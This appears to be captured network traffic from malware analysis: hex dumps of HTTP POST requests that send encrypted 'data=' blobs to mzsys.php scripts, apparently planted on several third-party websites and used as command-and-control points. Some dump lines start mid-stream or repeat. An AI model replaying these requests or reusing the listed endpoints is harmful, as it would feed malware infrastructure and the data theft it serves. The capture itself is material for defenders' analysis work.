0x00000360 (00864)   39363742 43304343 41333733 43304331   967BC0CCA373C0C1
0x00000370 (00880)   34343046 30433841 39343036 32303242   440F0C8A9406202B
0x00000380 (00896)   31443436 39343631 41303744 33394246   1D469461A07D39BF
0x00000390 (00912)   41424545 32354630 35324337 39444646   ABEE25F052C79DFF
0x000003a0 (00928)   32323944 41393043 45343943 45464242   229DA90CE49CEFBB
0x000003b0 (00944)   36354431 31443333 36393646 33393646   65D11D33696F396F
0x000003c0 (00960)   333dd401                              3=..

0x00000000 (00000)   504f5354 202f746d 702f6d7a 7379732e   POST /tmp/mzsys.
0x00000010 (00016)   70687020 48545450 2f312e31 0d0a4163   php HTTP/1.1..Ac
0x00000020 (00032)   63657074 3a206e2c 202c202c 202c202c   cept: n, , , , ,
0x00000030 (00048)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000040 (00064)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000050 (00080)   202c202c 200d0a43 6f6e7465 6e742d54    , , ..Content-T
0x00000060 (00096)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000070 (00112)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x00000080 (00128)   6e636f64 65640d0a 55736572 2d416765   ncoded..User-Age
0x00000090 (00144)   6e743a20 4d6f7a69 6c6c612f 352e3020   nt: Mozilla/5.0 
0x000000a0 (00160)   2857696e 646f7773 204e5420 362e333b   (Windows NT 6.3;
0x000000b0 (00176)   20574f57 36343b20 54726964 656e742f    WOW64; Trident/
0x000000c0 (00192)   372e303b 20546f75 63683b20 72763a31   7.0; Touch; rv:1
0x000000d0 (00208)   312e3029 206c696b 65204765 636b6f0d   1.0) like Gecko.
0x000000e0 (00224)   0a486f73 743a2063 686f6e62 75726963   .Host: chonburic
0x000000f0 (00240)   6f6f702e 6e65740d 0a436f6e 74656e74   oop.net..Content
0x00000100 (00256)   2d4c656e 6774683a 20363435 0d0a4361   -Length: 645..Ca
0x00000110 (00272)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x00000120 (00288)   63616368 650d0a0d 0a646174 613d3338   cache....data=38
0x00000130 (00304)   33384436 45323443 32384430 44333832   38D6E24C28D0D382
0x00000140 (00320)   45393735 31353545 37303932 41344445   E975155E7092A4DE
0x00000150 (00336)   32343638 46334331 36334231 43453536   2468F3C163B1CE56
0x00000160 (00352)   42333430 38334134 38384636 35424445   B34083A488F65BDE
0x00000170 (00368)   35444430 41354631 45303436 32444532   5DD0A5F1E0462DE2
0x00000180 (00384)   38383331 46363845 34463039 45363937   8831F68E4F09E697
0x00000190 (00400)   41463243 33464631 30343934 31414531   AF2C3FF104941AE1
0x000001a0 (00416)   42333833 34394438 36433638 44353242   B38349D86C68D52B
0x000001b0 (00432)   33463236 38364646 46463434 34383242   3F2686FFFF44482B
0x000001c0 (00448)   42424444 34464444 43414638 39303833   BBDD4FDDCAF89083
0x000001d0 (00464)   41423839 42333245 32463441 45434536   AB89B32E2F4AECE6
0x000001e0 (00480)   42443830 33393233 36434637 42313030   BD8039236CF7B100
0x000001f0 (00496)   43363445 43394434 37424330 41354443   C64EC9D47BC0A5DC
0x00000200 (00512)   35423433 35373034 31433342 43354641   5B4357041C3BC5FA
0x00000210 (00528)   43363431 38454434 42343938 30373938   C6418ED4B4980798
0x00000220 (00544)   46393838 32354630 32304445 44303744   F98825F020DED07D
0x00000230 (00560)   30383434 46383743 45434138 43343337   0844F87CECA8C437
0x00000240 (00576)   45324339 30354438 45443243 45423432   E2C905D8ED2CEB42
0x00000250 (00592)   34374645 46394244 38433442 43413232   47FEF9BD8C4BCA22
0x00000260 (00608)   30393837 45383144 45333332 39413444   0987E81DE3329A4D
0x00000270 (00624)   36373544 41363845 32313141 45343441   675DA68E211AE44A
0x00000280 (00640)   39373942 30363631 41454246 32453732   979B0661AEBF2E72
0x00000290 (00656)   44424130 37303836 43383733 33443235   DBA07086C8733D25
0x000002a0 (00672)   42313636 37323942 39363533 43333633   B166729B9653C363
0x000002b0 (00688)   42353341 34464644 33383942 42433635   B53A4FFD389BBC65
0x000002c0 (00704)   32423839 39453032 33383331 45313744   2B899E023831E17D
0x000002d0 (00720)   39343137 34363239 31323239 31383143   941746291229181C
0x000002e0 (00736)   45353546 32434130 39433730 30414445   E55F2CA09C700ADE
0x000002f0 (00752)   33353043 46334344 39463235 34364338   350CF3CD9F2546C8
0x00000300 (00768)   43413131 36434543 46414130 34303537   CA116CECFAA04057
0x00000310 (00784)   31414139 44434343 37373043 37373630   1AA9DCCC770C7760
0x00000320 (00800)   30423737 37303630 38374236 39463333   0B77706087B69F33
0x00000330 (00816)   31354230 44463934 32394536 39393133   15B0DF9429E69913
0x00000340 (00832)   35433037 33444439 30464144 36393032   5C073DD90FAD6902
0x00000350 (00848)   43393637 42433043 43413337 33433043   C967BC0CCA373C0C
0x00000360 (00864)   31343430 46304338 41393430 36323032   1440F0C8A9406202
0x00000370 (00880)   42314434 36393436 31413037 44333942   B1D469461A07D39B
0x00000380 (00896)   46414245 45323546 30353243 37394446   FABEE25F052C79DF
0x00000390 (00912)   46323239 44413930 43453439 43454642   F229DA90CE49CEFB
0x000003a0 (00928)   42363544 31314433 33363936 46334242   B65D11D33696F3BB
0x000003b0 (00944)   36354431 31443333 36393646 33393646   65D11D33696F396F
0x000003c0 (00960)   333dd401                              3=..

0x00000000 (00000)   504f5354 202f7465 6d706c61 7465732f   POST /templates/
0x00000010 (00016)   736a5f69 63656e74 65722f68 746d6c2f   sj_icenter/html/
0x00000020 (00032)   6d6f645f 6b325f63 6f6e7465 6e742f44   mod_k2_content/D
0x00000030 (00048)   65666175 6c742f6d 7a737973 2e706870   efault/mzsys.php
0x00000040 (00064)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000050 (00080)   743a206e 2c202c20 2c202c20 2c202c20   t: n, , , , , , 
0x00000060 (00096)   2c202c20 2c202c20 2c202c20 2c202c20   , , , , , , , , 
0x00000070 (00112)   2c202c20 2c202c20 2c202c20 2c202c20   , , , , , , , , 
0x00000080 (00128)   2c200d0a 436f6e74 656e742d 54797065   , ..Content-Type
0x00000090 (00144)   3a206170 706c6963 6174696f 6e2f782d   : application/x-
0x000000a0 (00160)   7777772d 666f726d 2d75726c 656e636f   www-form-urlenco
0x000000b0 (00176)   6465640d 0a557365 722d4167 656e743a   ded..User-Agent:
0x000000c0 (00192)   204d6f7a 696c6c61 2f352e30 20285769    Mozilla/5.0 (Wi
0x000000d0 (00208)   6e646f77 73204e54 20362e33 3b20574f   ndows NT 6.3; WO
0x000000e0 (00224)   5736343b 20547269 64656e74 2f372e30   W64; Trident/7.0
0x000000f0 (00240)   3b20546f 7563683b 2072763a 31312e30   ; Touch; rv:11.0
0x00000100 (00256)   29206c69 6b652047 65636b6f 0d0a486f   ) like Gecko..Ho
0x00000110 (00272)   73743a20 70617373 6c696674 2e636f6d   st: passlift.com
0x00000120 (00288)   0d0a436f 6e74656e 742d4c65 6e677468   ..Content-Length
0x00000130 (00304)   3a203634 350d0a43 61636865 2d436f6e   : 645..Cache-Con
0x00000140 (00320)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x00000150 (00336)   0d0a6461 74613d33 38333844 36453234   ..data=3838D6E24
0x00000160 (00352)   43323844 30443338 32453937 35313535   C28D0D382E975155
0x00000170 (00368)   45373039 32413444 45323436 38463343   E7092A4DE2468F3C
0x00000180 (00384)   31363342 31434535 36423334 30383341   163B1CE56B34083A
0x00000190 (00400)   34383846 36354244 45354444 30413546   488F65BDE5DD0A5F
0x000001a0 (00416)   31453034 36324445 32383833 31463638   1E0462DE28831F68
0x000001b0 (00432)   45344630 39453639 37414632 43334646   E4F09E697AF2C3FF
0x000001c0 (00448)   31303439 34314145 31423338 33343944   104941AE1B38349D
0x000001d0 (00464)   38364336 38443532 42334632 36383646   86C68D52B3F2686F
0x000001e0 (00480)   46464634 34343832 42424244 44344644   FFF44482BBBDD4FD
0x000001f0 (00496)   44434146 38393038 33414238 39423332   DCAF89083AB89B32
0x00000200 (00512)   45324634 41454345 36424438 30333932   E2F4AECE6BD80392
0x00000210 (00528)   33364346 37423130 30433634 45433944   36CF7B100C64EC9D
0x00000220 (00544)   34374243 30413544 43354234 33353730   47BC0A5DC5B43570
0x00000230 (00560)   34314333 42433546 41433634 31384544   41C3BC5FAC6418ED
0x00000240 (00576)   34423439 38303739 38463938 38323546   4B4980798F98825F
0x00000250 (00592)   30323044 45443037 44303834 34463837   020DED07D0844F87
0x00000260 (00608)   43454341 38433433 37453243 39303544   CECA8C437E2C905D
0x00000270 (00624)   38454432 43454234 32343746 45463942   8ED2CEB4247FEF9B
0x00000280 (00640)   44384334 42434132 32303938 37453831   D8C4BCA220987E81
0x00000290 (00656)   44453333 32394134 44363735 44413638   DE3329A4D675DA68
0x000002a0 (00672)   45323131 41453434 41393739 42303636   E211AE44A979B066
0x000002b0 (00688)   31414542 46324537 32444241 30373038   1AEBF2E72DBA0708
0x000002c0 (00704)   36433837 33334432 35423136 36373239   6C8733D25B166729
0x000002d0 (00720)   42393635 33433336 33423533 41344646   B9653C363B53A4FF
0x000002e0 (00736)   44333839 42424336 35324238 39394530   D389BBC652B899E0
0x000002f0 (00752)   32333833 31453137 44393431 37343632   23831E17D9417462
0x00000300 (00768)   39313232 39313831 43453535 46324341   91229181CE55F2CA
0x00000310 (00784)   30394337 30304144 45333530 43463343   09C700ADE350CF3C
0x00000320 (00800)   44394632 35343643 38434131 31364345   D9F2546C8CA116CE
0x00000330 (00816)   43464141 30343035 37314141 39444343   CFAA040571AA9DCC
0x00000340 (00832)   43373730 43373736 30304237 37373036   C770C77600B77706
0x00000350 (00848)   30383742 36394633 33313542 30444639   087B69F3315B0DF9
0x00000360 (00864)   34323945 36393931 33354330 37334444   429E699135C073DD
0x00000370 (00880)   39304641 44363930 32433936 37424330   90FAD6902C967BC0
0x00000380 (00896)   43434133 37334330 43313434 30463043   CCA373C0C1440F0C
0x00000390 (00912)   38413934 30363230 32423144 34363934   8A9406202B1D4694
0x000003a0 (00928)   36314130 37443339 42464142 45453235   61A07D39BFABEE25
0x000003b0 (00944)   46303532 43373944 46463232 39444139   F052C79DFF229DA9
0x000003c0 (00960)   30434534 39434546 42423635 44313144   0CE49CEFBB65D11D
0x000003d0 (00976)   33333639 364633                       33696F3

0x00000000 (00000)   504f5354 202f6d6f 64756c65 732f6d6f   POST /modules/mo
0x00000010 (00016)   645f7370 65656475 702f6d7a 7379732e   d_speedup/mzsys.
0x00000020 (00032)   70687020 48545450 2f312e31 0d0a4163   php HTTP/1.1..Ac
0x00000030 (00048)   63657074 3a206e2c 202c202c 202c202c   cept: n, , , , ,
0x00000040 (00064)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000050 (00080)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000060 (00096)   202c202c 200d0a43 6f6e7465 6e742d54    , , ..Content-T
0x00000070 (00112)   7970653a 20617070 6c696361 74696f6e   ype: application
0x00000080 (00128)   2f782d77 77772d66 6f726d2d 75726c65   /x-www-form-urle
0x00000090 (00144)   6e636f64 65640d0a 55736572 2d416765   ncoded..User-Age
0x000000a0 (00160)   6e743a20 4d6f7a69 6c6c612f 352e3020   nt: Mozilla/5.0 
0x000000b0 (00176)   2857696e 646f7773 204e5420 362e333b   (Windows NT 6.3;
0x000000c0 (00192)   20574f57 36343b20 54726964 656e742f    WOW64; Trident/
0x000000d0 (00208)   372e303b 20546f75 63683b20 72763a31   7.0; Touch; rv:1
0x000000e0 (00224)   312e3029 206c696b 65204765 636b6f0d   1.0) like Gecko.
0x000000f0 (00240)   0a486f73 743a2061 6374696f 6e706f75   .Host: actionpou
0x00000100 (00256)   72697372 61656c2e 636f6d0d 0a436f6e   risrael.com..Con
0x00000110 (00272)   74656e74 2d4c656e 6774683a 20363435   tent-Length: 645
0x00000120 (00288)   0d0a4361 6368652d 436f6e74 726f6c3a   ..Cache-Control:
0x00000130 (00304)   206e6f2d 63616368 650d0a0d 0a646174    no-cache....dat
0x00000140 (00320)   613d3338 33384436 45323443 32384430   a=3838D6E24C28D0
0x00000150 (00336)   44333832 45393735 31353545 37303932   D382E975155E7092
0x00000160 (00352)   41344445 32343638 46334331 36334231   A4DE2468F3C163B1
0x00000170 (00368)   43453536 42333430 38334134 38384636   CE56B34083A488F6
0x00000180 (00384)   35424445 35444430 41354631 45303436   5BDE5DD0A5F1E046
0x00000190 (00400)   32444532 38383331 46363845 34463039   2DE28831F68E4F09
0x000001a0 (00416)   45363937 41463243 33464631 30343934   E697AF2C3FF10494
0x000001b0 (00432)   31414531 42333833 34394438 36433638   1AE1B38349D86C68
0x000001c0 (00448)   44353242 33463236 38364646 46463434   D52B3F2686FFFF44
0x000001d0 (00464)   34383242 42424444 34464444 43414638   482BBBDD4FDDCAF8
0x000001e0 (00480)   39303833 41423839 42333245 32463441   9083AB89B32E2F4A
0x000001f0 (00496)   45434536 42443830 33393233 36434637   ECE6BD8039236CF7
0x00000200 (00512)   42313030 43363445 43394434 37424330   B100C64EC9D47BC0
0x00000210 (00528)   41354443 35423433 35373034 31433342   A5DC5B4357041C3B
0x00000220 (00544)   43354641 43363431 38454434 42343938   C5FAC6418ED4B498
0x00000230 (00560)   30373938 46393838 32354630 32304445   0798F98825F020DE
0x00000240 (00576)   44303744 30383434 46383743 45434138   D07D0844F87CECA8
0x00000250 (00592)   43343337 45324339 30354438 45443243   C437E2C905D8ED2C
0x00000260 (00608)   45423432 34374645 46394244 38433442   EB4247FEF9BD8C4B
0x00000270 (00624)   43413232 30393837 45383144 45333332   CA220987E81DE332
0x00000280 (00640)   39413444 36373544 41363845 32313141   9A4D675DA68E211A
0x00000290 (00656)   45343441 39373942 30363631 41454246   E44A979B0661AEBF
0x000002a0 (00672)   32453732 44424130 37303836 43383733   2E72DBA07086C873
0x000002b0 (00688)   33443235 42313636 37323942 39363533   3D25B166729B9653
0x000002c0 (00704)   43333633 42353341 34464644 33383942   C363B53A4FFD389B
0x000002d0 (00720)   42433635 32423839 39453032 33383331   BC652B899E023831
0x000002e0 (00736)   45313744 39343137 34363239 31323239   E17D941746291229
0x000002f0 (00752)   31383143 45353546 32434130 39433730   181CE55F2CA09C70
0x00000300 (00768)   30414445 33353043 46334344 39463235   0ADE350CF3CD9F25
0x00000310 (00784)   34364338 43413131 36434543 46414130   46C8CA116CECFAA0
0x00000320 (00800)   34303537 31414139 44434343 37373043   40571AA9DCCC770C
0x00000330 (00816)   37373630 30423737 37303630 38374236   77600B77706087B6
0x00000340 (00832)   39463333 31354230 44463934 32394536   9F3315B0DF9429E6
0x00000350 (00848)   39393133 35433037 33444439 30464144   99135C073DD90FAD
0x00000360 (00864)   36393032 43393637 42433043 43413337   6902C967BC0CCA37
0x00000370 (00880)   33433043 31343430 46304338 41393430   3C0C1440F0C8A940
0x00000380 (00896)   36323032 42314434 36393436 31413037   6202B1D469461A07
0x00000390 (00912)   44333942 46414245 45323546 30353243   D39BFABEE25F052C
0x000003a0 (00928)   37394446 46323239 44413930 43453439   79DFF229DA90CE49
0x000003b0 (00944)   43454642 42363544 31314433 33363936   CEFBB65D11D33696
0x000003c0 (00960)   46334534 39434546 42423635 44313144   F3E49CEFBB65D11D
0x000003d0 (00976)   33333639 364633                       33696F3


Strings